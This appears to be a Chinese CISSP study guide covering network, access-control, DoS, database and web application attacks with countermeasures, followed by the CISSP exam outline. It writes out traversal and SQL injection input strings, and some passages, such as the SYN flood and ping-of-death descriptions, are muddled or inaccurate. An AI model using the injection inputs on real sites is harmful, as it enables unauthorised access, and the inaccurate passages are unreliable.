对付假冒攻击的解决方案包括:使用一次性填充和令牌身份验证系统,使用 Kerberos , —289— 使用加密,从而增加从网络通信中提取身份验证凭证的难度。 4.重放攻击 Replay Attacks 重放攻击是假冒攻击的一种,它可以利用通过偷听捕获的网络通信进行攻击。重放攻击企 图通过对系统重放被捕获的通信来重建通信会话。你可以使用一次性身份验证机制和序列化会 话身份标识来防范重放攻击。 5.修改攻击 Modification Attacks 能够更改被捕获的数据包,然后再将其放回到系统中。被修改的数据包被设计为能够避开 改良的身份验证机制和会话排序的限制。针对修改重放攻击的对策包括数字签名验证和数据包 校验和验证。 6.地址解析协议欺骗 Address Resolution Protocol Spoofing ARP 用于通过轮询使用系统的 IP 地址来发现该系统的 MAC 地址。对付 ARP 攻击的手段包 括:为关键系统定义静态的 ARP 映射,监控 ARP 缓存中的 MAC-TP 地址映射,或者使用 IDS 检 查系统通信中的异常以及 ARP 通信中的变化。 7. DNS 投毒、欺骗和劫持 DNS Poisoning, Spoofing, and Hijacking 详细的不想讲了,在第三域的 E.1 章节讲了。 8. 超链接欺骗 Hyperlink Spoofing 与 ARP 相关联的另一种攻击是超链接欺骗。这种类似于 DNS 欺骗的攻击用于将通信重定 向至欺诈系统或冒名系统,或者简单地将通信发送至预定目的地之外的任何地方。超链接欺骗 既可以采用 DNS 欺骗的形式,也可以只是简单地在发送给客户端的文档的 HTML 代码中修改超 链接 URL,因为大多数用户并不通过 DNS 验证 URL 中的域名,而是认定超链接是合法的并进 行点击,所以超链接欺骗攻击往往都会成功。 网络钓鱼(phishing)是另一种经常使用超链接欺骗的攻击。网络钓鱼意味着诱骗他人上 钩,从而获得信息。这种攻击可以采用很多形式,包括使用伪造的 URL。 9.泛洪 flooding attack 泛洪这个词一点都不好听,也不知道是谁在什么时候发明的,洪泛这个词是错的。泛洪就 是泛滥的意思,也有教材说泛洪是交换机和网桥使用的一种数据流传递技术,将某个接口收到 的数据流从该接口之外的所有接口发送出去。如果数据帧中的目的MAC地址不在MAC地址表中, 就要向所有端口转发,请示回应。泛洪攻击有以下几种: ①SYN 泛洪。利用 TCP 的三次握手机制,有两种:PING 包泛洪就是向目的大量 PING,死 亡之 PING;smurf 就是向网络发大量改了回应地址的 SYS 包,让主机(或僵尸网)都把响应包 发送给目的机。 ②DHCP 泛洪。 ③ARP 泛洪。 ④UDP 泛洪。 10.VLAN 攻击 下面给出针对 VLAN 在数据链路层的最常见的攻击: ①MAC 洪泛攻击:这是不典型的网络“攻击”,但会限制所有交换机和网桥的工作方式。 如果交换机的 ARP 地址映射表已满,地址不再被学习,则流量将被永久进行(来源口)端口泛洪 —290— (portsflooding)。 ②802.1Q 和交换链路间协议(ISL)标记攻击:标记攻击允许在一个 VLAN 中的用户获得未 经授权的访问权限,来访问另一个 VLAN。例如,如果一个 Cisco 交换机端口被配置为动态中 继协议(DTP)收到了假 DTP 包,它可能成为一个中继端口,并接受另外一个 vlan 的流量。这通 常被称为“VLAN 泄漏”。这可以通过设置关闭所有非 DTP 信任端口进行防范,也可以通过简 单的配置指南或软件的升级来防范。 ③双封装 802.1q/nested VLAN 攻击:在交换机内,VLAN 号码和识别信息是放置在一个特 殊的扩展格式,允许转发路径保持端到端隔离 VLAN 不丢失任何信息。ISL 是 Cisco 专有技术, 在某种意义上是一个紧凑的扩展报头。一个 VLAN,没有明确对一个 802.1Q 链路相关的任何标 签。这个 VLAN 是隐式用于一个 802.1Q 端口收到的所有未标记的通信能力。这种能力是可取的, 因为它允许 802.lQ 端口能够与旧的 802.3 端口直接发送和接收数据流量。当双封装 802.1 Q 包注入到网络设备的 VLAN 是一个 TRUNK 的 native VLAN 时,这些数据包的 VLAN 标识不能从端 到端保存,这是因为 802.1Q TRUNK 总是通过剥离外层标签修改数据包。在外部标签去除后, 内部标签只有数据包的 VLAN 标识符。区此,采用两个不同的标签双封装数据包,流量可以跨 越 VLAN。 ④ARP 攻击:不说了。ARP 中毒或 ARP 欺骗还有中间人攻击什么的。 ⑤组播暴力攻击:这种攻击试图利用交换机的潜在漏洞,发起二层多播帧的风暴。正确的 行为应该是限制源 VLAN 的通信流量,不当的行为会泄露帧到其他 VLAN。 ⑥生成树攻击:另一种攻击,试图利用可能的交换机的弱点发起 STP 攻击。攻击需要在链 路上,嗅探得到 STP 帧,得到端口上开启的 STP ID,然后,攻击者会发送 STP 的配置/拓扑变 化确认 BPDU,宣布他是一个很低的优先级的新根桥。 ⑦随机帧暴力攻击:这最后的攻击,可以有很多形式,但总的来说是蛮力攻击,随机变化 的一个或几个数据包字段,而保留了源地址和目的地址,等常数信息。 11.战争拨号 由于调制解调器几乎允许从任何地方远程访问网络,往往作为攻击者进攻网络的门户入 口。使用自动拨号软件,攻击者可以拨号来识别那些是公司的调制解调器。如果与该调制解调 器连接的主机,使用一个弱密码,那么攻击者可以很容易地访问网络。更糟糕的是,如果语音 和数据共享同一网络.那么语音和数据可能都被破坏。 最好的防御这种攻击的方式是,要确保所有的调制解调器使用双因素认证。 八、针对访问控制的攻击(第五域) 1.访问聚合攻击 Access Aggregation Attacks 通过收集多个非敏感信息块,并将他们结合来获得敏感信息。(第三域,E.3 章节里的数 据库安全里,已经讲了聚合攻击和推理攻击)。网络侦察(Reconnaissance)就是是访问聚合攻 击,结合多种工具来识别系统的多个元素,如 IP 地址、开放端口、运行服务、操作系统等等。 应结合严格访问控制、“需知”和最小特权原则来预防聚合攻击。 2.密码攻击 Password Attacks 破了管理员密码或特权密码,也就得到了一切。所以很多单位都要求必须设置“强密码”。 —291— ①字典攻击 Dictionary Attacks 密码攻击的一种,比暴力破解快此地,但必须要有好的字典。此外,字典式攻击经常会扫 描差别构建式密码。一个差别构建式密码是之前使用过的密码,但有一个字符的不同。例如, passwordl 是 password 更改一个字符后的密码,其它的如 Password、lpassword 和 passXword 也是。攻击者在生成彩虹表时经常使用这种方法。 ②暴力攻击 Brute-Force Attacks 密码攻击的一种,通过尝试所有可能的字母、数字和符号组合来发现用户帐户的密码。密 码越长,计算量就越大。还有一种常用的方法是:散列值匹配查找。因为密码都不会在网络上 发送,传输和存储的都是其散列值,所以只要能找到 1 个散列冲突(碰撞)collision,就可 以实现登陆破解了。要破解散列值,就要用到生日悖论和彩虹表了。 ③生日攻击 Birthday Attack 第三域 I.8 章节已经讲过生日悖论了。如果把 23 个人关在一个房间,那么任何两人同一 天生日的可能性有 50%;如果有 367 人在一个房间里,你会有 100%的机会获得至少两个有相同 生日的人。MD5 已经被破解了,SHA-3 目前还是安全的。 ④彩虹表攻击 Rainbow Table Attacks 彩虹表预先计算好的各种字符串和散列值的映射数据库。使用 4 种字符类型的 14 位字符 长度的密码的散列的彩虹表大约是 7.5GB 大小。这不大吧,可以大幅加快密码破解速度。 许多系统一般通过“加盐”密码来减少彩虹表攻击的有效性。盐是一组随机位,在散列前 加到密码中。加密方法在散列前就加入附加位,这样随机性更大了,使攻击者更难以使用彩虹 表密码 ⑤嗅探攻击 Sniffer Attacks 一个嗅探器(也称为数据包分析器或协议分析仪)是)个软件应用程序,通过网络捕捉和分 析流量。Wireshark 是一种受欢迎的协议分析器。 3.电子欺骗攻击 Spoofing Attacks/masquerading 电子欺骗(即伪装)是指假装成某物或某人等。电子欺骗的种类很多,有 IP 欺骗、邮件欺 骗、电话欺骗等等。 4.社会工程学攻击 Social Engineering Attacks 社会工程不难,但每次考试都会出几道题!社会工程就是与人斗,其乐无穷。 ①网络钓鱼 Phishing 钓鱼邮件告知用户虚假信息,然后就能骗到有用的信息,或者实现木马植入。 ②鱼叉式钓鱼 Spear Phishing 针对特定用户组的钓鱼方式。 ③捕鲸 Whaling 捕鲸是的目标是大鱼、高层或高管。 ④语音钓鱼 Vishing 纯属忽悠,就能搞定。 5.智能卡攻击 Smartcard Attacks 各种途径搞定卡的信息。 —292— ①故障生成(fault generation)攻击 攻击者通过操纵智能卡的一些环境组件(改变输入电压、时钟频率、温度波动)来引入这些 “错误”。在向智能卡引入一个错误之后,攻击者会检查某个加密函数的结果,并查看没有出 现错误时智能卡执行该函数得到的正确结果。分析这些不同的结果使得攻击者能够对加密过程 进行反向工程,井有望获得加密密钥。这种攻击也称为故障生成攻击。 ②旁路攻击(side-channel attack) 是非入侵式攻击,并且用于在不利用任何形式的缺陷或弱点的情况下找出与组件运作方式 相关的敏感信息。针对智能卡的差分功率分析(differential power analysis,查看处理过程 中的功率发射)、电磁分析(electromagnetic analysis. 查看发射出的频率)和计时(完成特定 过程所需的时间)都是旁路攻击的示例。 ③微区探查(microprobing) 使用针头和超声振动去除智能卡电路上的外部保护材料,随后就可以通过直接连接智能卡 的 ROM 芯片来访问和操纵其中的数据。 九、分析攻击汲取经验(第七域) 1.拒绝式服务攻击 Denial-of-Service Attacks 拒绝服务(DoS)攻击能够阻止系统处理或响应来自资源和客体的合法数据或请求。拒绝服 务攻击的最常见形式是向服务器传输使其无法全部处理的过多数据包,或让系统崩溃或 100% 的 CPU 使用率。另一种形式的 DoS 攻击是一种分布式拒绝服务(DDoS)攻击。还有一种变体的 DoS 形式被称为分布式反射拒绝服务(DRDoS) distributed reflective denial-of-service, 域名服务(DNS)投毒攻击和 smurf 攻击就是这样的例子。 2.SYN 泛洪攻击 SYN Flood Attack(让你回不停) SYN 泛洪攻击是一种常见的 DoS 攻击。它通过破坏 TCP/IP 启动通信会话的三步握手标准 来实施攻击。通常,客户端向服务器发出 SYN (同步) 数据包,服务器向客户端发送 SYN/ACK (同 步/应答)响应数据包,随后客户端向服务器回应 ACK (应答)数据包。这样三步握手建立起了 两个系统间的一个用于数据传输的会话,这个会话直到出现 FIN (结束)或 RST (重置)包才会 断开。然而,在一个同步字符(SYN)洪水式攻击发生时,攻击者发送成千上万个 SYN 包但不回 复响应。这类似于一个喜欢开玩笑的人伸出手去握手,但是当其他人做出回应,伸出手准备握 手时,他却将手缩了回来,留下对方的手悬在半空中。 使用 SYN Cookies 是阻断这攻击的一种方法。这些小记录消耗小部分系统资源,当系统 接收到 ACK 应答肘,它检查 SYN Cookie 并建立会话。防火墙通常能够通过入侵检测和入侵防 御系统检测 SYN 攻击。阻断这种攻击的另一种方法是降低 TCP 重置攻击服务器通常会等待一 段时间以接收 ACK 应答。默认时间是三分钟,但在正常操作中合法系统发送 ACK 应答并不需 要这么长的时间。通过减少时间,半开的会话在系统内存中的刷新会更快。 3.TCP 重置攻击 TCP Reset Attack(让你连不上) 另一种通过操纵TCP 会话的攻击方式叫做TCP 重置攻击,会话通常是FIN(完成)或RST(复 位)包。攻击者可以在一个 RST 包中伪造源 IP 地址并断开会话活动。两个系统之间则需要重 新建立会话。这对系统来说是一个很大的威胁,两系统之间需要持续的会话,以保持数据。当 —293— 会话重建时,系统就需要重建数据,所以这不仅仅只是来回发送三个数据包以建立会话的问题。 4.Smurf 和 Fraggle 攻击(前者反弹、后者 UDP) Srnurf(欺骗)和 Fraggle(磁片)攻击都属于 DoS 攻击。Smurf 攻击是另一种类型的洪 水式攻击,但它使用 Internet 控制消息协议(ICMP) 回送数据包而不是 TCP SYN 包攻击其他 系统。更具体地说,它是一个使用受害者的 IP 地址作为源 IP 地址的伪造广播 ping,让全网 都响应并回送数据包至受害 IP。在 1999 年发行的 RFC 2644 改变了路由器的标准,路由器不 能转发定向广播,网络便不能被放大。这给 Smurf 攻击单一的网络带来了限制。此外,在防 火墙上禁用 ICMP 能够防止利用 ICMP 的任何类型的攻击。现在 Smurf 攻击己经很少见了。 Fraggle 攻击类似于 Smurf 攻击。然而,Fraggle 攻击使用 UDP 端口 7 和 19 而不是 ICMP。 Fraggle 攻击能够使用伪造 IP 地址将一个 UDP 数据包发送给受害者。所有的系统就都会将其 转发给受害者,这类似于 Smurf 攻击。 SMURF 是反弹攻击,消耗带宽(ICMP);FRAGGLE 消耗性能(UDP)。 5.Ping 洪水攻击(呼死你) Ping 洪水攻击,通过给受害者发送洪水般的请求来达到攻击目的,在 DDOS 攻击中给僵尸 网络发送僵尸信息的效果很明显。如果成千上万的系统同时给一个系统发送 ping 请求,该系 统将在试图回答 plng 请求时发生混乱。 6.僵尸网络 Botnets 今天僵尸网络相当普遍。僵尸网络中的计算机就像机器人(通常称为僵尸 zombies,也叫 肉机),并将会按照攻击者的要求执行命令。僵尸牧人 bot herder 通常是指通过一个或多个命 令控制所有计算机和服务器的罪犯。 7.死亡之 Ping/Ping of Death(PING 大包) 一个 ping 死亡攻击采用了一个超大的 ping 数据包,即超过 64 字节,甚至大到 64KB。 当系统收到 ping 包大于 64 KB 时,就会出现问题。现今死亡 PING 攻击很少能够成功,因为补 丁和更新改善了系统的脆弱性。 8.泪滴攻击 Teardrop(拼不完整) 在泪滴攻击中,攻击者阻碍交通,系统无法将数据包一起发回。大数据包通常被分成较小 的碎片,当它们被发送到网络上时,接收系统把数据包碎片还原到原来的状态。然而,泪滴以 一种系统不能将文件还原在一起的方式分割数据包。旧的系统无法处理这种情况,并会崩溃, 但补丁解决了这个问题。此外,入侵检测系统可以检查畸形数据包。 7.Land 攻击(自己搞自己) Land 攻击是指攻击者使用受害者的 IP 地址作为源 IP 地址和目的 IP 地址,并发送伪造 的 SYN 包给受害者。这使系统不断地对自己做出应答,并最终可能会冻结,崩溃或重新启动。 这种攻击在 1997 被第一次发现,它又几次攻击不同的端口。保持一个系统更新并使用过滤流 量检测相同的源和目的地地址,有助于防止 Land 攻击的发生。 8.零日攻击 Zero-day Exploit 零日漏洞是指利用他人未知的系统漏洞对系统发起攻击,也指无法修补的漏洞。 9.恶意代码 Malicious Code 恶意代码是指在计算机系统上执行不必要的、未经授权的或未知活动的脚本或程序。恶意 —294— 代码可以采取多种形式,包括病毒,蠕虫,木马,具有破坏性宏的文件,和逻辑炸弹。它通常 被称为恶意软件,或恶意代码。恶意代码存在于每一种类型的计算机或计算设备,是现今最常 见的安全漏洞。 10.中间人攻击 Man-in-the-Middle Attacks 当一个恶意用户能够在一个正在进行的通信的两个端点之间的逻辑上获得一个位置时, 一个中间人攻击就会产生。中间人攻击有两种。一个涉及复制或刺探双方通信,这基本上算是 嗅探器攻击;另一种类型是攻击者在通信线上定位自己,他们将其作为一个存储和转发或代理 机制,客户端和服务器认为它们是直接连接的。攻击者可以收集登录凭据和其他敏感数据,以 及改变两个系统之间交换的消息内容。 中间人攻击比其他许多攻击需要更多技术性,因为从客户角度出发,攻击者需要冒充服务 器,从服务器的角度来看,还要模拟客户端。中间人攻击往往需要一个组合的多个攻击。例如 攻击者可能会改变路由信息和 DNS 的值,或伪造地址解析协议(ARP)查找。 11.战争拨号 War Dialing 使用调制解调器搜索接受入站连接尝试的系统的行为,就是大量拨号。一旦检测到某个计 算机载波音,战争拨号器就会在搜索过程结束时所生成的报告中添加相应的电话号码。一种新 的战争拨号的形式能够在不适用调制解调器的情况下,使用语音互联网协议(VoIP)拨号,这使 得攻击者能够扫描到更多的电话号码,并发现除了调制解调器以外的其他设备,如传真机、语 音信箱、拨号音和人类的声音。 抵御恶意战争拨号攻击的对策包括:实施强大的远程访问安全性(主要依靠强的身份验 证),确保不存在未授权的调制解调器,以及使用回叫安全机制、协议约束与呼叫登入。 12.破坏 Sabotage 员工破坏指的是员工对单位的破坏行为。员工被解雇后必须立即终止或禁用其账户,预防 员工破坏的其他保障措施还存定期审计、监测异常或未经授权的活动,保持员工和管理人员之 间的沟通开放,并适当奖励员工。 13.间谍 Espionage 间谍活动是一种收集专有的、秘密的、私人的、敏感的或机密信息的恶意行为。 十、针对数据库的攻击(第八域) 1.聚合 Aggregation 聚集攻击是通过收集大量的低安全级别的或低价值的数据,将它们结合起来,创造较高安 全级别或有价值的信息。对于数据库来讲,就必须严格控制对聚合函数的访问并且充分估计可 能展示给未授权个体的潜在信息,这些对数据库安全管理员来说是特别重要的。 SQL 就供了许多可从一个或多个表中组合记录并生成有用信息的函数包括 count,mm, mate,sum,avg 等,这一过程就是聚合。数据库管理员应该严格控制聚合函数的访问,并且 可以使用视图(view)的访问方式。防范聚合的对策有: ①基于内容的访问控制(Content-dependent access control):根据数据本身的敏感度来 管理访问控制。 ②数据库分区技术可以防止聚合和推理。每个分区都具有唯一的、不同安全级别的内容。 —295— ③视图可以防止聚合攻击。在数据库中实现多级安全性的一种途径是使用数据库视图。视 图可以整理来自多个表的数据、聚合单独的记录或限制用户访问数据库属性和/或记录的有限 子集。在数据库中,视图被存储为 SQL 语旬,而不是被存储为数据表。这样可以减少所需的数 据库空间,并且允许视图违反应用于数据表的规格化规则。因为视图非常灵活,所以许多数据 库管理员将视图作为一种安全工具使用,就是允许用户只与受限的视图交互,而非与作为视图 基础的原始数据表交互。 ④结合严格访问控制、“需知”和最小特权原则来预防聚合攻击。 2.推理 Inference 推理与聚合有点像,推理攻击利用几个非敏感信息片的组合,从而获得对应该属于更高级 分类的信息。推理需要利用人的推断能力,而聚合只是简单的叠加。对于推理攻击的最好的防 范是对有特权的个人用户保持持续的警惕。此外,数据的故意混淆可以被用来防止对敏感信息 的推理。最后,你可以使用数据库分区帮助降低这些攻击。防范推理攻击的方法有: ①单元抑制(cell suppression):隐藏特定存储单元的内容,限制用户对特定内容的访问。 ②数据库分隔/分区(database partition):把数据库逻辑分区,用视图来提供访问。 ③噪声与扰动(noise and perturbation):在数据库中插入伪造信息,误导和迷惑攻击者。 ④基于上下文的访问控制(Contest-dependent access control):根据访问的状态或者顺 序来限制对某些内容的访问,需要一定的学习功能。 ⑤基于内容的访问控制(Content-dependent access control):根据数据本身的敏感度来 管理访问控制。(信息分级) ⑥多实例(Plolyinstantiation)在同一个关系数据库表中两行或更多行(无组)具有相 同的主键,且为不同密级的用户提供不同的数据查询结果,就是多实例。主要防范推理攻击。 (这个点经常考到) ③旁路攻击 用户试图绕过数据训应用的前端控制访问数据。 ④并发 并发相关的问题包括使用旧数据执行过程,不一致的更新,或发生死锁。 ⑤死锁 当两个用户同时访问信息而且都被拒绝时就发生死锁。 ⑥攻击数据库视图以非法访问 用户可能试图受限视图或修改一个已经存在的视图;在数据库接口设计中经常使用的分层 模型提供了一个相同数据的多条路径,不是所有的路径都受到保护。 ⑦拒绝服务 任务类型的可以阻止授权用户共聚信息的攻击或行动。 ⑧不当信息修改 未授权或授权用户可能故意或无意的错误地修改信息。 ⑨查询攻击 用户尝试使用查询工具来访问不能正常地通过可信前端访问的数据。 ⑩服务器访问 —296— 数据库运行的服务器必须防止未授权的逻辑访问同时也要防止未授权的物理访问以防止 逻辑控制被禁用。 ⑾数据污染 由于输入数据错误或错误的处理导致的数据完整性破坏。 ⑿数据拦截(中间人) 如果允许拨号或其它类型的远程访问,必须控制拦截会话或修改传输中的数据的威胁。 ⒀检查时间/使用时间(TOC/TOU)(必考) TOC/TOU 也可能发生在数据库中。一个例子是,一些类型的恶意代码或特权访问可以改变 数据,在用户的查询被许可时和数据展现给用户时。 ⒁未授权访问 故意可无意地将信息发布给未授权用户。例如系统的错误消息或系统提示,提供了关于服 务功能特性等方面的信息。 要实现多种等级的数据库访问控制和安全防护,有很多方法: ①使用视图 Views 视图可以防止聚合攻击。在数据库中实现多级安全性的一种途径是使用数据库视图。视图 可以整理来自多个表的数据、聚合单独的记录或限制用户访问数据库属性和/或记录的有限子 集。在数据库中,视图被存储为 SQL 语旬,而不是被存储为数据表。这样可以减少所需的数据 库空间,并且允许视图违反应用于数据表的规格化规则。因为视图非常灵活,所以许多数据库 管理员将视图作为一种安全工具使用,就是允许用户只与受限的视图交互,而非与作为视图基 础的原始数据表交互。 ②并发性 Concurrency 并发性使用“锁定”功能来允许己授权用户更改数据,同时拒绝其他用户访问查看或更改 数据元素。只有更改完成并“解锁”后,才允许其他用户访问。并发性或编辑控制是一种预防 性的安全机制,这种机制试图使数据库中存储的数据始终是正确的,或者至少使其完整性和可 用性受到保护。 ③语义完整性 Semantic integrity 语义完整性是 DBMS 的一种常见安全特性,确保用户的动作不会违反任何结构上的规则。 此外,还检查所有存储的数据类型都是有效的,符合逻辑的,并且确认系统遵守任何和所有的 唯一性约束。 ④时间戳 Time stamp 通过标记日期和时间来维护数据的完整性和可用性。 ⑤细粒度控制 granularly DBMS 的另一个常见安全特性是在数据库内能够细粒度控制对象。例如:内容相关的访问 控制(基于内容)Content-dependent,分析内容之间的关系来阻止用户访问与他无关的数据, 或者有利益冲突的数据。 ⑥单元抑制 cell suppression 对单独的数据库字段或单元隐藏或强加更安全的约束。 ⑦上下文相关的访问控制(基于上下文环境)Context-dependent —297— 上下文相关的访问控制通过宏观评估来制定访问控制策略,它分析每个对象、数据包或字 段如何与总体的活动或通信相联系,在较大的上下文环境中就会表露出是有益的还是有害的。 ⑧数据库分区 database partitioning 数据库分区技术可以防止聚合和推理漏洞。 ⑨多实例 Polyinstantiation 在同一个关系数据库表中两行或更多行具有相同的主键,且为不同密级的用户提供不同的 数据查询结果,就是多实例。主要防范推理攻击。(这个点经常考到) ⑩噪声和干扰 false or misleading data 在 DBMS 中插入错误的或伪造的数据,从而重定向或阻挠窃密攻击。但一定要确保插入到 数据库中的噪声不影响业务运营。 ⑾锁控制 锁用来控制读和写访问特定的关系系统中的数据行或面向对象系统中的对象。可以在表, 行,记录,或甚至字段上加锁,这些相关的要求也被称为 ACID 测试。 十一、针对软件开发的攻击(第八域) 客户端都要通过发送指令、表单什么的请求 WEB 服务,必须要对 WEB 输入的内容进行验证, 不然会因为输入一些特殊字符而被攻击。如: 1.路径/目录遍历(Path or directory traversal):这个攻击又被称为“点-点-斜线”、 “../”dot dot slash;在 URL 中接入几个“../”就可以访问上级的文件目录了。 2.统一代码编码(Unicode encoding):Unicode 是一种行业标准,开发他的目的是为了以 标准的编码格式来表示世界上的 10 万多个文本字符。Web 服务器通过 Unicode 来支持不同的 字符,在 Unicode 下,攻击者不用“../”来攻击,而使用 Unicode 的“%C1%lc,%c0%9v, and %C0%af”来攻击。 3.网址编码(URL encoding):在 URL 中,“空格“表示为“%20”,其实其它字符也可以 在 URL 里用特殊的方式来发送。 4.客户端验证(Client-side validation ):是指将指令发送到服务器之前在客户端进行 验证,如果黑客劫持攻击者环境,插入恶意数据,也就绕过了这个验证了。 1.缓冲区溢出 Buffer Overflows 输入内存的数据太大,就会“溢出”其存储空间(编程函数先定义一个变量 var 什么的, 执行时操作系统会给程序一个内存空间的),溢到隔壁的存储空间里,可能被正常执行了或影 响别的进程了。利用缓冲区溢出漏洞可以在服务器上执行任意代码。 许多编程语言对变量的长度不强制实施限制,这就要求编程人员对代码进行边界检查。只 要允许用户输入程序变量,编程人员就应当采取有效措施,确保满足下列各项条件: ①用户输入的值的长度不能超过任何存放它的缓冲区的大小。 ②用户不能向保存输入值的变量类型输入无效的值。 ③用户输入的数值不能超出程序规定的参数操作范围。 如果没有执行对上述条件的简单检查,那么就可能造成缓冲区溢出漏洞。 —298— 2.检验时间/使用时间攻击 Time of Check to Time of Use(必考) 也称为异步攻击(asychronous attack),有的人把竞争条件(race condition)也看作是 这种攻击,其实是不一样的,竞争条件是改变进程的顺序(排序);TOC/TOU 是进入 2 个进程 之间进行更改(插队)。 检验时间到使用时间(time-of-check-to-time-of-use,TOCTTOU 或 TOC/TOU)是一个时间 型漏洞,当程序检查访问许可权限的时间早于资源请求的时间时,就会出现这种问题。例如, 如果操作系统针对用户登录建立了一个综合的访问许可权限列表并且在整个登录会话期间查 询这个列表,那么就存在 TOC/TOU 漏洞。如果系统管理员取消了某个特殊的权限,那么这个限 制只有在用户下次登录时才会起作用。如果在用户登录的时候正好发生取消访问许可权限的操 作,那么用户是否能够访问资源就是不确定的。用户只需保留会话打开数天之久,新的限制就 永远不会被应用。 对策:系统应当使用原子操作;操作系统可以使用软件锁。 3.跨站脚本攻击(XSS) Cross-Site Scripting(必考!) 术语“跨站点脚本(Cross-Site Scripting,XSS)”指的是利用一个 Web 站点的脆弱性, 在 Web 应用程序中注入恶意代码的攻击。攻击者(用客户端脚本语言,如 JavaScript)把他们 的恶意代码注入到网页中。随后,不知情的用户在访问这个站点时,恶意代码就会在他们的浏 览器中执行,这样可能会导致 Cookies 被盗、会话被劫持、恶意代码被执行和访问控制被绕 过,或者有助于利用浏览器的错落性。XSS 攻击的关键在于将恶意代码写入 Web 站点。一般是 在一个有返回结果的表单网页里,输入带<SCRIPT>标记的字段,服务器收到表单内容就会运行 里面的恶意代码了。XSS 有三种类型: ①非永久/非持久性 XSS (NonpersistentXSS),也叫反映漏洞/反射脆弱性,出现在攻击 者欺骗受害者处理一个用流氓脚本来编程的 URL,从而偷取受害者敏感信息(cookie,会话 ID 等)的时候。这个攻击的原理是利用动态网站上缺少适当的输入或者输出确证。(就是返回一 个有恶意代码的 URL 给用户点击) ②永久/持久性 XSS(PersistentXSS),也叫二阶漏洞,也称为存储或者第二顺序脆弱性, 通常针对的是那些让用户输入存储在数据库或其他任何地方(如论坛、留言板、意见簿等)的数 据的网站。攻击者张贴一些包含恶意 JavaScript 的文本,在其他用户浏览这些帖子时,它们 的浏览器会呈现这个页面并执行攻击者的 JavaScript。(就是把恶意代码存入网站) ③基于文档对象模型/DOM 型(Document Object Model based XSS )。也叫本地跨站点脚 本。DOM 是标准结构布局,代表着浏览器中的 HTML 和 XML。在这样的攻击中,像表单字段和 cookie 这样的文档组件可以通过 JavaScript 被引用。攻击者利用 DOM 环境来修改最初的客户 端 JavaScript。这使受害者的浏览器执行由此而导致的 JavaScript 代码。 4. SQL 注入攻击 Injection(必考!) SQL 注入攻击比 XSS 更加危险,它同样是向 Web 应用程序输入带特殊字符的表单字段,只 是它的目的不是欺骗用户,而是访问数据库。在动态网页中,经常会让用户输入附录密码、查 询关键字等表单内容,然后发送给数据库进行查询或比对。如果把输入的字段加一些特殊字符, 就可以让 SQL 语言执行额外的操作,从而进入数据库。比如:正解的输入密码是“123456”; 要想注入就输入“123456';XXXXX WHERE 'a' = 'a”,那么数据库会执行 2 条正常的 SQL 语 —299— 言了。 可以通过下列三种技术来防范: ①执行输入验证。与跨站脚本攻击的防御方法一样,输入验证操作能够限制用户在表单中 输入的数据类型。 ②限制用户特权。Web 服务器使用的数据库账户应当具有尽可能最小的权限。 ③利用数据库存储过程来限制应用程序执行任意代码的能力。存储过程就是:SQL 语句已 经编写并封装好了,驻留在数据库服务器,仅可由数据库管理员修改;Web 应用程序则调用各 种现成的存储过程来运行,不直接通过 SQL 语句来访问数据库。 5.侦察攻击/网络侦察扫描 Reconnaissance Attacks 目的就是找 IP、端口和漏洞。搞渗透测试必须技能,工具软件一大堆,著名的有 Nmap、 Nessus,OpenVAS 什么的,应该都玩过。 6.伪装攻击 Masquerading Attacks ①IP 欺骗 IP Spoofing 很简单,防范方法是在每个网络的边缘配置过滤程序,确保数据包满足以下标准: *内部 IP 地址的包不能从外网进入。 *外部 IP 地址的包不能从内网出去。 *私有 IP 地址的包不能过路由器。 ②会话劫持 Session Hijacking 会话劫持攻击指的是攻击者中途拦截己授权用户与资源之间的通信数据,然后使用劫持技 术接管这个会话并伪装成己授权用户的身份。如: *捕获客户端与服务器之间身份验证的详细信息,并使用这些信息伪装成客户端的身份。 *欺骗客户端,使其认为攻击者的系统是与之通信的服务器,并在客户端与服务器建立合 法连接的时候作为中间人(代理),断开服务器与客户端的连接。 *使用没有正常关闭连接的用户的 cookie 数据访问 Web 应用程序。 7.内存重用(客体重用) 内存被重新分配后,要清空被覆写。 其它还有:陷门/后门/维护钩子等,好多。 考试大纲 注册信息系统安全师 生效期:2018年4月 CISSP Certification Exam Outline 2 关于CISSP 注册信息系统安全师(CISSP)是全球最受广泛认可的信息安全认证。CISSP认证反映了持证者具备有效设计、 构建及管理组织整体安全态势所需的深厚信息安全技术、管理知识、技能与经验。 CISSP的公共知识体系(CBK)中包含的广泛议题确保了与信息安全领域中所有原理的相关性。通过认证的考生 展示了在以下八大知识域的能力: • 安全与风险管理 • 资产安全 • 安全架构与工程 • 通信与网络安全 • 身份与访问管理 • 安全评估与测试 • 安全运营 • 软件开发安全 经验要求 考生必须在(ISC)2 CISSP公共知识体系(CBK)八大知识域中的至少两个或两个以上领域,拥有至少5年全职工作 经验。拥有4年大学本科学历或同等学历,以及(ISC)2认可的其它证书可以抵免一年的工作经验。所有教育学位 最多只能抵免一年工作经验。 没有满足CISSP所需工作经验的考生,如果能够通过CISSP考试则可以成为(ISC)2的准会员(Associate) 。(ISC)2 的准会员可以用接下来的6年时间积累所需工作经验。 认可 CISSP是业界首张符合ANSI/ ISO/IEC 17024 国际标准要求的信息安全认证。 工作任务分析(Job Task Analysis) (ISC)2对其会员有义务维护CISSP的关联性。定期进行工作任务分析(JTA)是一项系统而关键的过程,用来确定 由CISSP安全专业人士所从事的工作。JTA的分析结果会用来更新考试。这个过程确保了考生的测试题目与目前 从业的信息安全专业人士的角色和职责密切相关。 CISSP Certification Exam Outline 3 CISSP计算机自适应测试(CAT)的考试信息 CISSP CAT 考试的权重 考试时长 考题数量 考题格式 及格线 可提供的考试语言 测试中心 3小时 100道至150道 多项选择和高级创新型考题 1000分中得到700分 英语 (ISC)2 授权的、且由 PPC 和 PVTC 精选的 Pearson VUE 测试中心 领域 平均权重 1.安全与风险管理 15% 2.资产安全 10% 3.安全架构与工程 13% 4.通信与网络安全 14% 5.身份与访问管理 (IAM) 13% 6.安全评估与测试 12% 7.安全运营 13% 8.软件开发安全 10% 总计: 100% CISSP的所有英语考试都采用计算机自适应测试(CAT)。CISSP的其它语种的考试 采用线性和固定格式的测试。欲了解CISSP的CAT详情,请访问: www.isc2.org/ certificatons/CISSP-CAT。 CISSP Certification Exam Outline 4 CISSP线性考试信息 CISSP线性考试权重 考试时长 考题数量 考题格式 及格线 可提供的考试语言 测试中心 6小时 250道 多项选择和高级创新型考题 1000分中得到700分 法语、德语、巴西葡萄牙语、西班牙语、日语、简体中文、 韩语 (ISC)2 授权的、且由 PPC 和 PVTC 精选的 Pearson VUE 测 试中心 领域 权重 